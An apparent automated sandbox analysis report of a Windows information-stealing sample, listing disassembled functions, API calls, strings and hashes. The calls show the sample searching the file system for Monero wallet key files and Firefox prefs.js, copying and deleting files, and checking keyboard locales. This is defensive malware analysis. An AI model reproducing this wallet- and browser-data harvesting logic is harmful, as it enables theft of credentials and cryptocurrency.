                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 4e991fb9d7cb8ecb84ecda396d685f8c2a8bdfb6343e2061de4ee05e619bf728
                          • Instruction ID: 0c755d3cdbcd01474f96067fbf73e68398c3b864aa3d26edc6b57a991c505b2f
                          • Opcode Fuzzy Hash: 4e991fb9d7cb8ecb84ecda396d685f8c2a8bdfb6343e2061de4ee05e619bf728
                          • Instruction Fuzzy Hash: FCE1F972911118AAEB55FB60DC92EEE737CAF64301FC041E9B54A62052EF306F8ACF51
                          Function 0012F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001415B8,00140D96), ref: 0012F71E
                          • StrCmpCA.SHLWAPI(?,001415BC), ref: 0012F76F
                          • StrCmpCA.SHLWAPI(?,001415C0), ref: 0012F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0012FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: fdffca95fcc872e98ea317a2106fd6f75e22508976224f70d7315c7ab44b4455
                          • Instruction ID: 91902ecfac88d648823cf530de2a2355e00c3cc8281de47cf274bb32c6cd512b
                          • Opcode Fuzzy Hash: fdffca95fcc872e98ea317a2106fd6f75e22508976224f70d7315c7ab44b4455
                          • Instruction Fuzzy Hash: FAB14871900118ABDB24FF64DC96FEE7379AF64300F8085A8E54A97151EF316B4ACF92
                          Function 001216D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0014510C,?,?,?,001451B4,?,?,00000000,?,00000000), ref: 00121923
                          • StrCmpCA.SHLWAPI(?,0014525C), ref: 00121973
                          • StrCmpCA.SHLWAPI(?,00145304), ref: 00121989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00121D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00121DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00121E20
                          • FindClose.KERNEL32(000000FF), ref: 00121E32
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: f99f5d75bcf01a5b673af3c47d09863759ee2591229ffe56290b3f44f6aca489
                          • Instruction ID: 2f0e767cc9f86c84e1b222a25e97250bd4517097d7dad12500ab88bb0089b571
                          • Opcode Fuzzy Hash: f99f5d75bcf01a5b673af3c47d09863759ee2591229ffe56290b3f44f6aca489
                          • Instruction Fuzzy Hash: 27121071950118ABDB19FB60DC96EEE7378AF74301F8141E9B14A62091EF706F89CFA1
                          Function 0012DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00140C2E), ref: 0012DE5E
                          • StrCmpCA.SHLWAPI(?,001414C8), ref: 0012DEAE
                          • StrCmpCA.SHLWAPI(?,001414CC), ref: 0012DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0012E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: bb9cfa99bb3e17077b6ab67fad72301c72a9bd22d1af2852b9f83ef7523fe9be
                          • Instruction ID: b32ca8458387420d4cc31cc530dfa228a954b56b575e4219828453951cda403f
                          • Opcode Fuzzy Hash: bb9cfa99bb3e17077b6ab67fad72301c72a9bd22d1af2852b9f83ef7523fe9be
                          • Instruction Fuzzy Hash: 2AF1AF71854118AADB15FB60DCA5EEE7378BF24301FC141D9B54A62091EF706F8ACF62
                          Function 0012DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001414B0,00140C2A), ref: 0012DAEB
                          • StrCmpCA.SHLWAPI(?,001414B4), ref: 0012DB33
                          • StrCmpCA.SHLWAPI(?,001414B8), ref: 0012DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0012DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: b41aacde2af924a0ed5d39114e4f0946139b15bf42bb94082186b02887cf05fb
                          • Instruction ID: 8992821018a3c80e0ae30d42c94bca7545e70e0d308c11058202c5ab4baf2c5d
                          • Opcode Fuzzy Hash: b41aacde2af924a0ed5d39114e4f0946139b15bf42bb94082186b02887cf05fb
                          • Instruction Fuzzy Hash: A0916972900114A7DB14FBB0FC96DED737DAFA4300F808558F94A96181EF349B59CB92
                          Function 00137B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,001405AF), ref: 00137BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00137BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00137C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00137C62
                          • LocalFree.KERNEL32(00000000), ref: 00137D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 7b332f9676ed224728a506af4a4111183900368e49f1b83c2c3863dd74b536e5
                          • Instruction ID: 8a8bd31369dcb315163156ae4481430a9d1446727e92e3d38b109a533303df1f
                          • Opcode Fuzzy Hash: 7b332f9676ed224728a506af4a4111183900368e49f1b83c2c3863dd74b536e5
                          • Instruction Fuzzy Hash: 5B415CB1940218ABDB24DB94DC99BEEB7B8FF58700F6041D9E10972291DB742F85CFA1
                          Function 004F3E41 Relevance: 10.4, Strings: 7, Instructions: 1682COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %GIO$:"wn$;LuW$;LuW$Dx<x$q#;$wQo
                          • API String ID: 0-3945747622
                          • Opcode ID: c3fc3522d193be46f7e474679371107144005e444474cc9b4885c4cb2281b8a1
                          • Instruction ID: 6f574d81c7c44490a19e51bba526d1355842efff099d2582d3fa4063a4586be8
                          • Opcode Fuzzy Hash: c3fc3522d193be46f7e474679371107144005e444474cc9b4885c4cb2281b8a1
                          • Instruction Fuzzy Hash: 6CB217F3A0C2049FE304AE2DEC8567AFBE9EF94320F16493DE6C5C7744E63598418696
                          Function 004E9E03 Relevance: 10.3, Strings: 7, Instructions: 1594COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $+^;$;/w$=Rw/$c+^>$n+V$n+V$]_]
                          • API String ID: 0-4137713963
                          • Opcode ID: 3364906f2297da66c5644aff4e8bdd0c1204df6723b83a07ba48bae82d2c2161
                          • Instruction ID: 161473fd22b3ff2a82c331e1b519f85a18a7251ad895004cb7740b679574c437
                          • Opcode Fuzzy Hash: 3364906f2297da66c5644aff4e8bdd0c1204df6723b83a07ba48bae82d2c2161
                          • Instruction Fuzzy Hash: ACB2F7F3A0C204AFE3046E29DC4567AF7E5EFD4720F1A893DE6C4C3744EA3598458696
                          Function 0012E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00140D73), ref: 0012E4A2
                          • StrCmpCA.SHLWAPI(?,001414F8), ref: 0012E4F2
                          • StrCmpCA.SHLWAPI(?,001414FC), ref: 0012E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: c23029138ca3126f0365a6ebe5e17121c026f99762df48cfbf21b10f90f69271
                          • Instruction ID: 943155b9e8a84cf15600d4df7871d17542093e3f6dd393d9d3d8fa5e459b70d1
                          • Opcode Fuzzy Hash: c23029138ca3126f0365a6ebe5e17121c026f99762df48cfbf21b10f90f69271
                          • Instruction Fuzzy Hash: 8A122272910118AADB15FB70DCA6EED7378AF64300FC045E9B54AA6191EF306F49CF92
                          Function 004F8E8D Relevance: 7.8, Strings: 5, Instructions: 1587COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '&$$$wO$j_$p^1 $>EG
                          • API String ID: 0-2169947235
                          • Opcode ID: 5ebca3bf0a8992c65101519c494880a7b65997567cd7dc7b9453fcce9b6bf798
                          • Instruction ID: c4709fefebc1e2311e1c9e059f134d00008cd27487baa0509077bf6fd0e7dd12
                          • Opcode Fuzzy Hash: 5ebca3bf0a8992c65101519c494880a7b65997567cd7dc7b9453fcce9b6bf798
                          • Instruction Fuzzy Hash: F3B207F3A0C2149FE3046E29EC8567ABBE9EF94720F1A493DEAC4D3740E67558018797
                          Function 0012C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0012C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0012C87C
                          • lstrcat.KERNEL32(?,00140B46), ref: 0012C943
                          • lstrcat.KERNEL32(?,00140B47), ref: 0012C957
                          • lstrcat.KERNEL32(?,00140B4E), ref: 0012C978
                          Memory Dump Source
